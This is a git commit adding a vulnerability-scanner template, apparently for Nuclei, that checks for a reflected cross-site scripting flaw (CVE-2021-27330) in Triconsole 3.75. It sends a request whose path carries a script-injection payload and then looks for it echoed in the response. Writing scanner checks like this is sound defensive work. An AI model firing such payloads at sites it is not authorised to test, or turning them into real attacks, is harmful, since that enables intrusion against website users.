Create CVE-2021-27330.yaml

2021-03-01 11:46:14 +00:00 · 2021-03-01 11:46:14 +00:00 · da44a0face
parent 88c371f181
commit da44a0face
1 changed files with 25 additions and 0 deletions
--- a/cves/2021/CVE-2021-27330.yaml
+++ b/cves/2021/CVE-2021-27330.yaml
@ -0,0 +1,25 @@
+id: CVE-2021-27330
+
+info:
+  name: Triconsole 3.75 XSS
+  author: pikpikcu
+  severity: medium
+  reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-27330
+  tags: cve,cve2021,triconsole,xss
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/calendar_form.php/"><script>alert(document.domain)</script>'
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "<script>alert(document.domain)</script>"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200